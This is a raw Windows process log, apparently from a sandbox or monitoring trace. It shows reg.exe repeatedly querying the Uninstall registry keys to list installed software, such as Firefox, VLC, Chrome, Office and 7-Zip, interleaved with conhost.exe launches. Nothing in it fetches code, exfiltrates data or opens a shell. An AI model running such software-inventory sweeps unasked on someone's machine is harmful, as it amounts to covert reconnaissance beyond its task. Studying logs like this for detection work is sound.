C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge Update"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft EdgeWebView"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4d8dcf8c-a72a-43e1-9833-c12724db736e}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{61087a79-ac85-455c-934d-1fa22cc64f36}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{63880b41-04fc-4f9b-92c4-4455c255eb8c}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7DAD0258-515C-3DD4-8964-BD714199E0F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9BE518E6-ECC6-35A9-88E4-87755C07200F}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B175520C-86A2-35A7-8619-86DC379688B9}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BF08E976-B92E-4336-B56F-2171179476C4}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d87ae0f4-64a6-4b94-859a-530b9c313c27}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef5af41f-d68c-48f7-bfb0-5055718601fc}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\36c3a589-07cb-5a5c-93f2-7ca0c417a328
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}
C:\Windows\system32\reg.exe
